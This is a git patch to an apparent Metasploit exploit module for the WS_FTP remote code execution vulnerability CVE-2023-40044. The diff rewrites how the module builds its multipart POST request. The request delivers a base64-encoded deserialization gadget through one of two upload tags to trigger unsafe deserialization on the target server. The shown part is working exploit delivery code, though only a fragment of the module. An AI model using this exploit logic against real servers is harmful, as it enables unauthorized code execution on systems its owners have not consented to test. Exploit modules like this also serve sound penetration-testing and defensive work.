From 8431d116546aa01279b4ab212bc2928497370eb9 Mon Sep 17 00:00:00 2001
From: sfewer-r7 <stephen_fewer@rapid7.com>
Date: Wed, 4 Oct 2023 09:39:25 +0100
Subject: [PATCH] leverage Rex::MIME::Message instead of creating the multipart
 data manualy

---
 .../windows/http/ws_ftp_rce_cve_2023_40044.rb | 21 +++++++------------
 1 file changed, 7 insertions(+), 14 deletions(-)

diff --git a/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb b/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
index d7b576af6785..b38fa424a44f 100644
--- a/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
+++ b/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
@@ -128,25 +128,18 @@ def exploit
     # We can reach the unsafe deserialization via either of these tags. We pick a random one during exploitation.
     tags = %w[AHT_DEFAULT_UPLOAD_PARAMETER AHT_UPLOAD_PARAMETER]
 
-    boundary = rand_text_alphanumeric(8)
+    message = Rex::MIME::Message.new
 
-    data = "--#{boundary}\r\n"
-    data << "name: #{rand_text_alphanumeric(8)}\r\n"
-    data << "\r\n"
-    data << "::#{tags.sample}::#{Rex::Text.encode_base64(gadget)}\r\n"
-    data << "--#{boundary}–\r\n"
-    data << "\r\n"
+    part = message.add_part("::#{tags.sample}::#{Rex::Text.encode_base64(gadget)}\r\n", nil, nil, nil)
 
-    res = send_request_raw(
+    part.header.set('name', rand_text_alphanumeric(8))
+
+    res = send_request_cgi(
       {
         'uri' => normalize_uri(datastore['TARGET_URI']),
-        'headers' =>
-        {
-          'Content-Type' => 'multipart/form-data; boundary=' + boundary,
-          'Content-Length' => data.length
-        },
+        'ctype' => 'multipart/form-data; boundary=' + message.bound,
         'method' => 'POST',
-        'data' => data
+        'data' => message.to_s
       }
     )